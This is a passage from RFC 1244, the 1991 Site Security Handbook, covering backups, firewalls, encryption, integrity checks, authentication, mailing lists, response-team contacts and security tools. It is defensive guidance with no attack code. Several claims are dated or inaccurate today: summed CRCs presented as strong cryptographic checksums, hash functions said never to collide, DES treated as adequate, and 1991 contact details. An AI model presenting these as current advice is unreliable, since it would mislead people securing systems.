to be, it can be difficult to undo something an attacker has
done.

Backups, especially if run daily, can also be useful in
providing a history of an intruder’s activities. Looking
through old backups can establish when your system was first
penetrated. Intruders may leave files around which, although
deleted later, are captured on the backup tapes. Backups can
also be used to document an intruder’s activities to law
enforcement agencies if necessary.

A good backup strategy will dump the entire system to tape at
least once a month. Partial (or “incremental”) dumps should be

Site Security Policy Handbook Working Group [Page 33]

RFC 1244 Site Security Handbook July 1991

done at least twice a week, and ideally they should be done
daily. Commands specifically designed for performing file
system backups (e.g., UNIX “dump” or VMS “BACKUP”) should be
used in preference to other file copying commands, since these
tools are designed with the express intent of restoring a
system to a known state.

3.8.2.4 Problem Reporting Procedures

As with users, system administrators should have a defined
procedure for reporting security problems. In large
installations, this is often done by creating an electronic
mail alias which contains the names of all system
administrators in the organization. Other methods include
setting up some sort of response team similar to the CERT, or
establishing a “hotline” serviced by an existing support group.

3.9 Resources to Prevent Security Breaches

This section discusses software, hardware, and procedural resources
that can be used to support your site security policy.

3.9.1 Network Connections and Firewalls

A “firewall” is put in place in a building to provide a point of
resistance to the entry of flames into another area. Similarly, a
secretary’s desk and reception area provides a point of
controlling access to other office spaces. This same technique
can be applied to a computer site, particularly as it pertains to
network connections.

Some sites will be connected only to other sites within the same
organization and will not have the ability to connect to other
networks. Sites such as these are less susceptible to threats
from outside their own organization, although intrusions may still
occur via paths such as dial-up modems. On the other hand, many
other organizations will be connected to other sites via much
larger networks, such as the Internet. These sites are
susceptible to the entire range of threats associated with a
networked environment.

The risks of connecting to outside networks must be weighed
against the benefits. It may be desirable to limit connection to
outside networks to those hosts which do not store sensitive
material, keeping “vital” machines (such as those which maintain
company payroll or inventory systems) isolated. If there is a
need to participate in a Wide Area Network (WAN), consider
restricting all access to your local network through a single

Site Security Policy Handbook Working Group [Page 34]

RFC 1244 Site Security Handbook July 1991

system. That is, all access to or from your own local network
must be made through a single host computer that acts as a
firewall between you and the outside world. This firewall system
should be rigorously controlled and password protected, and
external users accessing it should also be constrained by
restricting the functionality available to remote users. By using
this approach, your site could relax some of the internal security
controls on your local net, but still be afforded the protection
of a rigorously controlled host front end.

Note that even with a firewall system, compromise of the firewall
could result in compromise of the network behind the firewall.
Work has been done in some areas to construct a firewall which
even when compromised, still protects the local network [6,
CHESWICK].

3.9.2 Confidentiality

Confidentiality, the act of keeping things hidden or secret, is
one of the primary goals of computer security practitioners.
Several mechanisms are provided by most modern operating systems
to enable users to control the dissemination of information.
Depending upon where you work, you may have a site where
everything is protected, or a site where all information is
usually regarded as public, or something in-between. Most sites
lean toward the in-between, at least until some penetration has
occurred.

Generally, there are three instances in which information is
vulnerable to disclosure: when the information is stored on a
computer system, when the information is in transit to another
system (on the network), and when the information is stored on
backup tapes.

The first of these cases is controlled by file permissions, access
control lists, and other similar mechanisms. The last can be
controlled by restricting access to the backup tapes (by locking
them in a safe, for example). All three cases can be helped by
using encryption mechanisms.

3.9.2.1 Encryption (hardware and software)

Encryption is the process of taking information that exists in
some readable form and converting it into a non-readable form.
There are several types of commercially available encryption
packages in both hardware and software forms. Hardware
encryption engines have the advantage that they are much faster
than the software equivalent, yet because they are faster, they

Site Security Policy Handbook Working Group [Page 35]

RFC 1244 Site Security Handbook July 1991

are of greater potential benefit to an attacker who wants to
execute a brute-force attack on your encrypted information.

The advantage of using encryption is that, even if other access
control mechanisms (passwords, file permissions, etc.) are
compromised by an intruder, the data is still unusable.
Naturally, encryption keys and the like should be protected at
least as well as account passwords.

Information in transit (over a network) may be vulnerable to
interception as well. Several solutions to this exist, ranging
from simply encrypting files before transferring them (end-to-
end encryption) to special network hardware which encrypts
everything it sends without user intervention (secure links).
The Internet as a whole does not use secure links, thus end-
to-end encryption must be used if encryption is desired across
the Internet.

3.9.2.1.1 Data Encryption Standard (DES)

DES is perhaps the most widely used data encryption
mechanism today. Many hardware and software implementations
exist, and some commercial computers are provided with a
software version. DES transforms plain text information
into encrypted data (or ciphertext) by means of a special
algorithm and “seed” value called a key. So long as the key
is retained (or remembered) by the original user, the
ciphertext can be restored to the original plain text.

One of the pitfalls of all encryption systems is the need to
remember the key under which a thing was encrypted (this is
not unlike the password problem discussed elsewhere in this
document). If the key is written down, it becomes less
secure. If forgotten, there is little (if any) hope of
recovering the original data.

Most UNIX systems provide a DES command that enables a user
to encrypt data using the DES algorithm.

3.9.2.1.2 Crypt

Similar to the DES command, the UNIX “crypt” command allows
a user to encrypt data. Unfortunately, the algorithm used
by “crypt” is very insecure (based on the World War II
“Enigma” device), and files encrypted with this command can
be decrypted easily in a matter of a few hours. Generally,
use of the “crypt” command should be avoided for any but the
most trivial encryption tasks.

Site Security Policy Handbook Working Group [Page 36]

RFC 1244 Site Security Handbook July 1991

3.9.2.2 Privacy Enhanced Mail

Electronic mail normally transits the network in the clear
(i.e., anyone can read it). This is obviously not the optimal
solution. Privacy enhanced mail provides a means to
automatically encrypt electronic mail messages so that a person
eavesdropping at a mail distribution node is not (easily)
capable of reading them. Several privacy enhanced mail
packages are currently being developed and deployed on the
Internet.

The Internet Activities Board Privacy Task Force has defined a
draft standard, elective protocol for use in implementing
privacy enhanced mail. This protocol is defined in RFCs 1113,
1114, and 1115 [7,8,9]. Please refer to the current edition of
the “IAB Official Protocol Standards” (currently, RFC 1200
[21]) for the standardization state and status of these
protocols.

3.9.3 Origin Authentication

We mostly take it on faith that the header of an electronic mail
message truly indicates the originator of a message. However, it
iseasy to “spoof”, or forge the source of a mail message. Origin
authentication provides a means to be certain of the originator of
a message or other object in the same way that a Notary Public
assures a signature on a legal document. This is done by means of
a “Public Key” cryptosystem.

A public key cryptosystem differs from a private key cryptosystem
in several ways. First, a public key system uses two keys, a
Public Key that anyone can use (hence the name) and a Private Key
that only the originator of a message uses. The originator uses
the private key to encrypt the message (as in DES). The receiver,
who has obtained the public key for the originator, may then
decrypt the message.

In this scheme, the public key is used to authenticate the
originator’s use of his or her private key, and hence the identity
of the originator is more rigorously proven. The most widely
known implementation of a public key cryptosystem is the RSA
system [26]. The Internet standard for privacy enhanced mail
makes use of the RSA system.

3.9.4 Information Integrity

Information integrity refers to the state of information such that
it is complete, correct, and unchanged from the last time in which

Site Security Policy Handbook Working Group [Page 37]

RFC 1244 Site Security Handbook July 1991

it was verified to be in an “integral” state. The value of
information integrity to a site will vary. For example, it is
more important for military and government installations to
prevent the “disclosure” of classified information, whether it is
right or wrong. A bank, on the other hand, is far more concerned
with whether the account information maintained for its customers
is complete and accurate.

Numerous computer system mechanisms, as well as procedural
controls, have an influence on the integrity of system
information. Traditional access control mechanisms maintain
controls over who can access system information. These mechanisms
alone are not sufficient in some cases to provide the degree of
integrity required. Some other mechanisms are briefly discussed
below.

It should be noted that there are other aspects to maintaining
system integrity besides these mechanisms, such as two-person
controls, and integrity validation procedures. These are beyond
the scope of this document.

3.9.4.1 Checksums

Easily the simplest mechanism, a simple checksum routine can
compute a value for a system file and compare it with the last
known value. If the two are equal, the file is probably
unchanged. If not, the file has been changed by some unknown
means.

Though it is the easiest to implement, the checksum scheme
suffers from a serious failing in that it is not very
sophisticated and a determined attacker could easily add enough
characters to the file to eventually obtain the correct value.

A specific type of checksum, called a CRC checksum, is
considerably more robust than a simple checksum. It is only
slightly more difficult to implement and provides a better
degree of catching errors. It too, however, suffers from the
possibility of compromise by an attacker.

Checksums may be used to detect the altering of information.
However, they do not actively guard against changes being made.
For this, other mechanisms such as access controls and
encryption should be used.

Site Security Policy Handbook Working Group [Page 38]

RFC 1244 Site Security Handbook July 1991

3.9.4.2 Cryptographic Checksums

Cryptographic checksums (also called cryptosealing) involve
breaking a file up into smaller chunks, calculating a (CRC)
checksum for each chunk, and adding the CRCs together.
Depending upon the exact algorithm used, this can result in a
nearly unbreakable method of determining whether a file has
been changed. This mechanism suffers from the fact that it is
sometimes computationally intensive and may be prohibitive
except in cases where the utmost integrity protection is
desired.

Another related mechanism, called a one-way hash function (or a
Manipulation Detection Code (MDC)) can also be used to uniquely
identify a file. The idea behind these functions is that no
two inputs can produce the same output, thus a modified file
will not have the same hash value. One-way hash functions can
be implemented efficiently on a wide variety of systems, making
unbreakable integrity checks possible. (Snefru, a one-way hash
function available via USENET as well as the Internet is just
one example of an efficient one-way hash function.) [10]

3.9.5 Limiting Network Access

The dominant network protocols in use on the Internet, IP (RFC
791) [11], TCP (RFC 793) [12], and UDP (RFC 768) [13], carry
certain control information which can be used to restrict access
to certain hosts or networks within an organization.

The IP packet header contains the network addresses of both the
sender and recipient of the packet. Further, the TCP and UDP
protocols provide the notion of a “port”, which identifies the
endpoint (usually a network server) of a communications path. In
some instances, it may be desirable to deny access to a specific
TCP or UDP port, or even to certain hosts and networks altogether.

3.9.5.1 Gateway Routing Tables

One of the simplest approaches to preventing unwanted network
connections is to simply remove certain networks from a
gateway’s routing tables. This makes it “impossible” for a
host to send packets to these networks. (Most protocols
require bidirectional packet flow even for unidirectional data
flow, thus breaking one side of the route is usually
sufficient.)

This approach is commonly taken in “firewall” systems by
preventing the firewall from advertising local routes to the

Site Security Policy Handbook Working Group [Page 39]

RFC 1244 Site Security Handbook July 1991

outside world. The approach is deficient in that it often
prevents “too much” (e.g., in order to prevent access to one
system on the network, access to all systems on the network is
disabled).

3.9.5.2 Router Packet Filtering

Many commercially available gateway systems (more correctly
called routers) provide the ability to filter packets based not
only on sources or destinations, but also on source-destination
combinations. This mechanism can be used to deny access to a
specific host, network, or subnet from any other host, network,
or subnet.

Gateway systems from some vendors (e.g., cisco Systems) support
an even more complex scheme, allowing finer control over source
and destination addresses. Via the use of address masks, one
can deny access to all but one host on a particular network.
The cisco Systems also allow packet screening based on IP
protocol type and TCP or UDP port numbers [14].

This can also be circumvented by “source routing” packets
destined for the “secret” network. Source routed packets may
be filtered out by gateways, but this may restrict other
legitimate activities, such as diagnosing routing problems.

3.9.6 Authentication Systems

Authentication refers to the process of proving a claimed identity
to the satisfaction of some permission-granting authority.
Authentication systems are hardware, software, or procedural
mechanisms that enable a user to obtain access to computing
resources. At the simplest level, the system administrator who
adds new user accounts to the system is part of the system
authentication mechanism. At the other end of the spectrum,
fingerprint readers or retinal scanners provide a very high-tech
solution to establishing a potential user’s identity. Without
establishing and proving a user’s identity prior to establishing a
session, your site’s computers are vulnerable to any sort of
attack.

Typically, a user authenticates himself or herself to the system
by entering a password in response to a prompt.
Challenge/Response mechanisms improve upon passwords by prompting
the user for some piece of information shared by both the computer
and the user (such as mother’s maiden name, etc.).

Site Security Policy Handbook Working Group [Page 40]

RFC 1244 Site Security Handbook July 1991

3.9.6.1 Kerberos

Kerberos, named after the dog who in mythology is said to stand
at the gates of Hades, is a collection of software used in a
large network to establish a user’s claimed identity.
Developed at the Massachusetts Institute of Technology (MIT),
it uses a combination of encryption and distributed databases
so that a user at a campus facility can login and start a
session from any computer located on the campus. This has
clear advantages in certain environments where there are a
large number of potential users who may establish a connection
from any one of a large number of workstations. Some vendors
are now incorporating Kerberos into their systems.

It should be noted that while Kerberos makes several advances
in the area of authentication, some security weaknesses in the
protocol still remain [15].

3.9.6.2 Smart Cards

Several systems use “smart cards” (a small calculator-like
device) to help authenticate users. These systems depend on
the user having an object in their possession. One such system
involves a new password procedure that require a user to enter
a value obtained from a “smart card” when asked for a password
by the computer. Typically, the host machine will give the
user some piece of information that is entered into the
keyboard of the smart card. The smart card will display a
response which must then be entered into the computer before
the session will be established. Another such system involves
a smart card which displays a number which changes over time,
but which is synchronized with the authentication software on
the computer.

This is a better way of dealing with authentication than with
the traditional password approach. On the other hand, some say
it’s inconvenient to carry the smart card. Start-up costs are
likely to be high as well.

3.9.7 Books, Lists, and Informational Sources

There are many good sources for information regarding computer
security. The annotated bibliography at the end of this document
can provide you with a good start. In addition, information can
be obtained from a variety of other sources, some of which are
described in this section.

Site Security Policy Handbook Working Group [Page 41]

RFC 1244 Site Security Handbook July 1991

3.9.7.1 Security Mailing Lists

The UNIX Security mailing list exists to notify system
administrators of security problems before they become common
knowledge, and to provide security enhancement information. It
is a restricted-access list, open only to people who can be
verified as being principal systems people at a site. Requests
to join the list must be sent by either the site contact listed
in the Defense Data Network’s Network Information Center’s (DDN
NIC) WHOIS database, or from the “root” account on one of the
major site machines. You must include the destination address
you want on the list, an indication of whether you want to be
on the mail reflector list or receive weekly digests, the
electronic mail address and voice telephone number of the site
contact if it isn’t you, and the name, address, and telephone
number of your organization. This information should be sent
to SECURITY-REQUEST@CPD.COM.

The RISKS digest is a component of the ACM Committee on
Computers and Public Policy, moderated by Peter G. Neumann. It
is a discussion forum on risks to the public in computers and
related systems, and along with discussing computer security
and privacy issues, has discussed such subjects as the Stark
incident, the shooting down of the Iranian airliner in the
Persian Gulf (as it relates to the computerized weapons
systems), problems in air and railroad traffic control systems,
software engineering, and so on. To join the mailing list,
send a message to RISKS-REQUEST@CSL.SRI.COM. This list is also
available in the USENET newsgroup “comp.risks”.

The VIRUS-L list is a forum for the discussion of computer
virus experiences, protection software, and related topics.
The list is open to the public, and is implemented as a
moderated digest. Most of the information is related to
personal computers, although some of it may be applicable to
larger systems. To subscribe, send the line:

SUB VIRUS-L your full name

to the address LISTSERV%LEHIIBM1.BITNET@MITVMA.MIT.EDU. This
list is also available via the USENET newsgroup “comp.virus”.

The Computer Underground Digest “is an open forum dedicated to
sharing information among computerists and to the presentation
and debate of diverse views.” While not directly a security
list, it does contain discussions about privacy and other
security related topics. The list can be read on USENET as
alt.society.cu-digest, or to join the mailing list, send mail

Site Security Policy Handbook Working Group [Page 42]

RFC 1244 Site Security Handbook July 1991

to Gordon Myer (TK0JUT2%NIU.bitnet@mitvma.mit.edu).
Submissions may be mailed to: cud@chinacat.unicom.com.

3.9.7.2 Networking Mailing Lists

The TCP-IP mailing list is intended to act as a discussion
forum for developers and maintainers of implementations of the
TCP/IP protocol suite. It also discusses network-related
security problems when they involve programs providing network
services, such as “Sendmail”. To join the TCP-IP list, send a
message to TCP-IP-REQUEST@NISC.SRI.COM. This list is also
available in the USENET newsgroup “comp.protocols.tcp-ip”.

SUN-NETS is a discussion list for items pertaining to
networking on Sun systems. Much of the discussion is related
to NFS, NIS (formally Yellow Pages), and name servers. To
subscribe, send a message to SUN-NETS-REQUEST@UMIACS.UMD.EDU.

The USENET groups misc.security and alt.security also discuss
security issues. misc.security is a moderated group and also
includes discussions of physical security and locks.
alt.security is unmoderated.

3.9.7.3 Response Teams

Several organizations have formed special groups of people to
deal with computer security problems. These teams collect
information about possible security holes and disseminate it to
the proper people, track intruders, and assist in recovery from
security violations. The teams typically have both electronic
mail distribution lists as well as a special telephone number
which can be called for information or to report a problem.
Many of these teams are members of the CERT System, which is
coordinated by the National Institute of Standards and
Technology (NIST), and exists to facilitate the exchange of
information between the various teams.

3.9.7.3.1 DARPA Computer Emergency Response Team

The Computer Emergency Response Team/Coordination Center
(CERT/CC) was established in December 1988 by the Defense
Advanced Research Projects Agency (DARPA) to address
computer security concerns of research users of the
Internet. It is operated by the Software Engineering
Institute (SEI) at Carnegie-Mellon University (CMU). The
CERT can immediately confer with experts to diagnose and
solve security problems, and also establish and maintain
communications with the affected computer users and

Site Security Policy Handbook Working Group [Page 43]

RFC 1244 Site Security Handbook July 1991

government authorities as appropriate.

The CERT/CC serves as a clearing house for the
identification and repair of security vulnerabilities,
informal assessments of existing systems, improvement of
emergency response capability, and both vendor and user
security awareness. In addition, the team works with
vendors of various systems in order to coordinate the fixes
for security problems.

The CERT/CC sends out security advisories to the CERT-
ADVISORY mailing list whenever appropriate. They also
operate a 24-hour hotline that can be called to report
security problems (e.g., someone breaking into your system),
as well as to obtain current (and accurate) information
about rumored security problems.

To join the CERT-ADVISORY mailing list, send a message to
CERT@CERT.SEI.CMU.EDU and ask to be added to the mailing
list. The material sent to this list also appears in the
USENET newsgroup “comp.security.announce”. Past advisories
are available for anonymous FTP from the host
CERT.SEI.CMU.EDU. The 24-hour hotline number is (412) 268-
7090.

The CERT/CC also maintains a CERT-TOOLS list to encourage
the exchange of information on tools and techniques that
increase the secure operation of Internet systems. The
CERT/CC does not review or endorse the tools described on
the list. To subscribe, send a message to CERT-TOOLS-
REQUEST@CERT.SEI.CMU.EDU and ask to be added to the mailing
list.

The CERT/CC maintains other generally useful security
information for anonymous FTP from CERT.SEI.CMU.EDU. Get
the README file for a list of what is available.

For more information, contact:

CERT
Software Engineering Institute
Carnegie Mellon University
Pittsburgh, PA 15213-3890

(412) 268-7090
cert@cert.sei.cmu.edu.

Site Security Policy Handbook Working Group [Page 44]

RFC 1244 Site Security Handbook July 1991

3.9.7.3.2 DDN Security Coordination Center

For DDN users, the Security Coordination Center (SCC) serves
a function similar to CERT. The SCC is the DDN’s clearing-
house for host/user security problems and fixes, and works
with the DDN Network Security Officer. The SCC also
distributes the DDN Security Bulletin, which communicates
information on network and host security exposures, fixes,
and concerns to security and management personnel at DDN
facilities. It is available online, via kermit or anonymous
FTP, from the host NIC.DDN.MIL, in SCC:DDN-SECURITY-yy-
nn.TXT (where “yy” is the year and “nn” is the bulletin
number). The SCC provides immediate assistance with DDN-
related host security problems; call (800) 235-3155 (6:00
a.m. to 5:00 p.m. Pacific Time) or send email to
SCC@NIC.DDN.MIL. For 24 hour coverage, call the MILNET
Trouble Desk (800) 451-7413 or AUTOVON 231-1713.

3.9.7.3.3 NIST Computer Security Resource and Response Center

The National Institute of Standards and Technology (NIST)
has responsibility within the U.S. Federal Government for
computer science and technology activities. NIST has played
a strong role in organizing the CERT System and is now
serving as the CERT System Secretariat. NIST also operates
a Computer Security Resource and Response Center (CSRC) to
provide help and information regarding computer security
events and incidents, as well as to raise awareness about
computer security vulnerabilities.

The CSRC team operates a 24-hour hotline, at (301) 975-5200.
For individuals with access to the Internet, on-line
publications and computer security information can be
obtained via anonymous FTP from the host CSRC.NCSL.NIST.GOV
(129.6.48.87). NIST also operates a personal computer
bulletin board that contains information regarding computer
viruses as well as other aspects of computer security. To
access this board, set your modem to 300/1200/2400 BPS, 1
stop bit, no parity, and 8-bit characters, and call (301)
948-5717. All users are given full access to the board
immediately upon registering.

NIST has produced several special publications related to
computer security and computer viruses in particular; some
of these publications are downloadable. For further
information, contact NIST at the following address:

Site Security Policy Handbook Working Group [Page 45]

RFC 1244 Site Security Handbook July 1991

Computer Security Resource and Response Center
A-216 Technology
Gaithersburg, MD 20899
Telephone: (301) 975-3359
Electronic Mail: CSRC@nist.gov

3.9.7.3.4 DOE Computer Incident Advisory Capability (CIAC)

CIAC is the Department of Energy’s (DOE’s) Computer Incident
Advisory Capability. CIAC is a four-person team of computer
scientists from Lawrence Livermore National Laboratory
(LLNL) charged with the primary responsibility of assisting
DOE sites faced with computer security incidents (e.g.,
intruder attacks, virus infections, worm attacks, etc.).
This capability is available to DOE sites on a 24-hour-a-day
basis.

CIAC was formed to provide a centralized response capability
(including technical assistance), to keep sites informed of
current events, to deal proactively with computer security
issues, and to maintain liaisons with other response teams
and agencies. CIAC’s charter is to assist sites (through
direct technical assistance, providing information, or
referring inquiries to other technical experts), serve as a
clearinghouse for information about threats/known
incidents/vulnerabilities, develop guidelines for incident
handling, develop software for responding to
events/incidents, analyze events and trends, conduct
training and awareness activities, and alert and advise
sites about vulnerabilities and potential attacks.

CIAC’s business hours phone number is (415) 422-8193 or FTS
532-8193. CIAC’s e-mail address is CIAC@TIGER.LLNL.GOV.

3.9.7.3.5 NASA Ames Computer Network Security Response Team

The Computer Network Security Response Team (CNSRT) is NASA
Ames Research Center’s local version of the DARPA CERT.
Formed in August of 1989, the team has a constituency that
is primarily Ames users, but it is also involved in
assisting other NASA Centers and federal agencies. CNSRT
maintains liaisons with the DOE’s CIAC team and the DARPA
CERT. It is also a charter member of the CERT System. The
team may be reached by 24 hour pager at (415) 694-0571, or
by electronic mail to CNSRT@AMES.ARC.NASA.GOV.

Site Security Policy Handbook Working Group [Page 46]

RFC 1244 Site Security Handbook July 1991

3.9.7.4 DDN Management Bulletins

The DDN Management Bulletin is distributed electronically by
the DDN NIC under contract to the Defense Communications Agency
(DCA). It is a means of communicating official policy,
procedures, and other information of concern to management
personnel at DDN facilities.

The DDN Security Bulletin is distributed electronically by the
DDN SCC, also under contract to DCA, as a means of
communicating information on network and host security
exposures, fixes, and concerns to security and management
personnel at DDN facilities.

Anyone may join the mailing lists for these two bulletins by
sending a message to NIC@NIC.DDN.MIL and asking to be placed on
the mailing lists. These messages are also posted to the
USENET newsgroup “ddn.mgt-bulletin”. For additional
information, see section 8.7.

3.9.7.5 System Administration List

The SYSADM-LIST is a list pertaining exclusively to UNIX system
administration. Mail requests to be added to the list to
SYSADM-LIST-REQUEST@SYSADMIN.COM.

3.9.7.6 Vendor Specific System Lists

The SUN-SPOTS and SUN-MANAGERS lists are discussion groups for
users and administrators of systems supplied by Sun
Microsystems. SUN-SPOTS is a fairly general list, discussing
everything from hardware configurations to simple UNIX
questions. To subscribe, send a message to SUN-SPOTS-
REQUEST@RICE.EDU. This list is also available in the USENET
newsgroup “comp.sys.sun”. SUN-MANAGERS is a discussion list
for Sun system administrators and covers all aspects of Sun
system administration. To subscribe, send a message to SUN-
MANAGERS-REQUEST@EECS.NWU.EDU.

The APOLLO list discusses the HP/Apollo system and its
software. To subscribe, send a message to APOLLO-
REQUEST@UMIX.CC.UMICH.EDU. APOLLO-L is a similar list which
can be subscribed to by sending

SUB APOLLO-L your full name

to LISTSERV%UMRVMB.BITNET@VM1.NODAK.EDU.

Site Security Policy Handbook Working Group [Page 47]

RFC 1244 Site Security Handbook July 1991

HPMINI-L pertains to the Hewlett-Packard 9000 series and HP/UX
operating system. To subscribe, send

SUB HPMINI-L your full name

to LISTSERV%UAFSYSB.BITNET@VM1.NODAK.EDU.

INFO-IBMPC discusses IBM PCs and compatibles, as well as MS-
DOS. To subscribe, send a note to INFO-IBMPC-REQUEST@WSMR-
SIMTEL20.ARMY.MIL.

There are numerous other mailing lists for nearly every popular
computer or workstation in use today. For a complete list,
obtain the file “netinfo/interest-groups” via anonymous FTP
from the host FTP.NISC.SRI.COM.

3.9.7.7 Professional Societies and Journals

The IEEE Technical Committee on Security & Privacy publishes a
quarterly magazine, “CIPHER”.

IEEE Computer Society,
1730 Massachusetts Ave. N.W.
Washington, DC 2036-1903

The ACM SigSAC (Special Interest Group on Security, Audit, and
Controls) publishes a quarterly magazine, “SIGSAC Review”.

Association for Computing Machinery
11 West 42nd St.
New York, N.Y. 10036

The Information Systems Security Association publishes a
quarterly magazine called “ISSA Access”.

Information Systems Security Association
P.O. Box 9457
Newport Beach, CA 92658

“Computers and Security” is an “international journal for the
professional involved with computer security, audit and
control, and data integrity.”

Site Security Policy Handbook Working Group [Page 48]

RFC 1244 Site Security Handbook July 1991

$266/year, 8 issues (1990)

Elsevier Advanced Technology
Journal Information Center
655 Avenue of the Americas
New York, NY 10010

The “Data Security Letter” is published “to help data security
professionals by providing inside information and knowledgable
analysis of developments in computer and communications
security.”

$690/year, 9 issues (1990)

Data Security Letter
P.O. Box 1593
Palo Alto, CA 94302

3.9.8 Problem Reporting Tools

3.9.8.1 Auditing

Auditing is an important tool that can be used to enhance the
security of your installation. Not only does it give you a
means of identifying who has accessed your system (and may have
done something to it) but it also gives you an indication of
how your system is being used (or abused) by authorized users
and attackers alike. In addition, the audit trail
traditionally kept by computer systems can become an invaluable
piece of evidence should your system be penetrated.

3.9.8.1.1 Verify Security

An audit trail shows how the system is being used from day
to day. Depending upon how your site audit log is
configured, your log files should show a range of access
attempts that can show what normal system usage should look
like. Deviation from that normal usage could be the result
of penetration from an outside source using an old or stale
user account. Observing a deviation in logins, for example,
could be your first indication that something unusual is
happening.

3.9.8.1.2 Verify Software Configurations

One of the ruses used by attackers to gain access to a
system is by the insertion of a so-called Trojan Horse
program. A Trojan Horse program can be a program that does

Site Security Policy Handbook Working Group [Page 49]

RFC 1244 Site Security Handbook July 1991

something useful, or merely something interesting. It
always does something unexpected, like steal passwords or
copy files without your knowledge [25]. Imagine a Trojan
login program that prompts for username and password in the
usual way, but also writes that information to a special
file that the attacker can come back and read at will.
Imagine a Trojan Editor program that, despite the file
permissions you have given your files, makes copies of
everything in your directory space without you knowing about
it.

This points out the need for configuration management of the
software that runs on a system, not as it is being
developed, but as it is in actual operation. Techniques for
doing this range from checking each command every time it is
executed against some criterion (such as a cryptoseal,
described above) or merely checking the date and time stamp
of the executable. Another technique might be to check each
command in batch mode at midnight.

3.9.8.2 Tools

COPS is a security tool for system administrators that checks
for numerous common security problems on UNIX systems [27].
COPS is a collection of shell scripts and C programs that can
easily be run on almost any UNIX variant. Among other things,
it checks the following items and sends the results to the
system administrator:

– Checks “/dev/kmem” and other devices for world
read/writability.

– Checks special or important files and directories for
“bad” modes (world writable, etc.).

– Checks for easily-guessed passwords.

– Checks for duplicate user ids, invalid fields in the
password file, etc..

– Checks for duplicate group ids, invalid fields in the
group file, etc..

– Checks all users’ home directories and their “.cshrc”,
“.login”, “.profile”, and “.rhosts” files for security
problems.

– Checks all commands in the “/etc/rc” files and “cron”

Site Security Policy Handbook Working Group [Page 50]

RFC 1244 Site Security Handbook July 1991

files for world writability.

– Checks for bad “root” paths, NFS file systems exported
to the world, etc..

– Includes an expert system that checks to see if a given
user (usually “root”) can be compromised, given that
certain rules are true.

– Checks for changes in the setuid status of programs on the
system.

The COPS package is available from the “comp.sources.unix”
archive on “ftp.uu.net”, and also from the UNIX-SW repository
on the MILNET host “wsmr-simtel20.army.mil”.

3.9.9 Communication Among Administrators

3.9.9.1 Secure Operating Systems

The following list of products and vendors is adapted from the
National Computer Security Center’s (NCSC) Evaluated Products
List. They represent those companies who have either received
an evaluation from the NCSC or are in the process of a product
evaluation. This list is not complete, but it is
representative of those operating systems and add on components
available in the commercial marketplace.

For a more detailed listing of the current products appearing
in the NCSC EPL, contact the NCSC at:

National Computer Security Center
9800 Savage Road
Fort George G. Meade, MD 20755-6000
(301) 859-4458

Site Security Policy Handbook Working Group [Page 51]

RFC 1244 Site Security Handbook July 1991

Version Evaluation
Evaluated Product Vendor Evaluated Class
———————————————————————–
Secure Communications Honeywell Information 2.1 A1
Processor (SCOMP) Systems, Inc.

Multics Honeywell Information MR11.0 B2
Systems, Inc.

System V/MLS 1.1.2 on UNIX AT&T 1.1.2 B1
System V 3.1.1 on AT&T 3B2/500and 3B2/600

OS 1100 Unisys Corp. Security B1
Release 1

MPE V/E Hewlett-Packard Computer G.03.04 C2
Systems Division

AOS/VS on MV/ECLIPSE series Data General Corp. 7.60 C2

VM/SP or VM/SP HPO with CMS, IBM Corp. 5 C2
RACF, DIRMAINT, VMTAPE-MS,
ISPF

MVS/XA with RACF IBM Corp. 2.2,2.3 C2

AX/VMS Digital Equipment Corp. 4.3 C2

NOS Control Data Corp. NOS
Security C2
Eval Product

TOP SECRET CGA Software Products 3.0/163 C2
Group, Inc.

Access Control Facility 2 SKK, Inc. 3.1.3 C2

UTX/32S Gould, Inc. Computer 1.0 C2
Systems Division

A Series MCP/AS with Unisys Corp. 3.7 C2
InfoGuard Security
Enhancements

Primos Prime Computer, Inc. 21.0.1DODC2A C2
Resource Access Control IBM Corp. 1.5 C1
Facility (RACF)

Site Security Policy Handbook Working Group [Page 52]

RFC 1244 Site Security Handbook July 1991

Version Candidate
Candidate Product Vendor Evaluated Class
———————————————————————–
Boeing MLS LAN Boeing Aerospace A1 M1

Trusted XENIX Trusted Information
Systems, Inc. B2

VSLAN VERDIX Corp. B2

System V/MLS AT&T B1

VM/SP with RACF IBM Corp. 5/1.8.2 C2
Wang SVS/OS with CAP Wang Laboratories, Inc. 1.0 C2

3.9.9.2 Obtaining Fixes for Known Problems

It goes without saying that computer systems have bugs. Even
operating systems, upon which we depend for protection of our
data, have bugs. And since there are bugs, things can be
broken, both maliciously and accidentally. It is important
that whenever bugs are discovered, a should fix be identified
and implemented as soon as possible. This should minimize any
exposure caused by the bug in the first place.

A corollary to the bug problem is: from whom do I obtain the
fixes? Most systems have some support from the manufacturer or
supplier. Fixes coming from that source tend to be implemented
quickly after receipt. Fixes for some problems are often
posted on the network and are left to the system administrators
to incorporate as they can. The problem is that one wants to
have faith that the fix will close the hole and not introduce
any others. We will tend to trust that the manufacturer’s
fixes are better than those that are posted on the net.

3.9.9.3 Sun Customer Warning System

Sun Microsystems has established a Customer Warning System
(CWS) for handling security incidents. This is a formal
process which includes:

– Having a well advertised point of contact in Sun
for reporting security problems.
– Pro-actively alerting customers of worms, viruses,
or other security holes that could affect their systems.
– Distributing the patch (or work-around) as quickly
as possible.

Site Security Policy Handbook Working Group [Page 53]

RFC 1244 Site Security Handbook July 1991

They have created an electronic mail address, SECURITY-
ALERT@SUN.COM, which will enable customers to report security
problems. A voice-mail backup is available at (415) 688-9081.
A “Security Contact” can be designated by each customer site;
this person will be contacted by Sun in case of any new
security problems. For more information, contact your Sun
representative.

3.9.9.4 Trusted Archive Servers

Several sites on the Internet maintain large repositories of
public-domain and freely distributable software, and make this
material available for anonymous FTP. This section describes
some of the larger repositories. Note that none of these
servers implements secure checksums or anything else
guaranteeing the integrity of their data. Thus, the notion of
“trust” should be taken as a somewhat limited definition.

3.9.9.4.1 Sun Fixes on UUNET

Sun Microsystems has contracted with UUNET Communications
Services, Inc., to make fixes for bugs in Sun software
available via anonymous FTP. You can access these fixes by
using the “ftp” command to connect to the host FTP.UU.NET.
Then change into the directory “sun-dist/security”, and
obtain a directory listing. The file “README” contains a
brief description of what each file in this directory
contains, and what is required to install the fix.

3.9.9.4.2 Berkeley Fixes

The University of California at Berkeley also makes fixes
available via anonymous FTP; these fixes pertain primarily
to the current release of BSD UNIX (currently, release 4.3).
However, even if you are not running their software, these
fixes are still important, since many vendors (Sun, DEC,
Sequent, etc.) base their software on the Berkeley releases.

The Berkeley fixes are available for anonymous FTP from the
host UCBARPA.BERKELEY.EDU in the directory “4.3/ucb-fixes”.
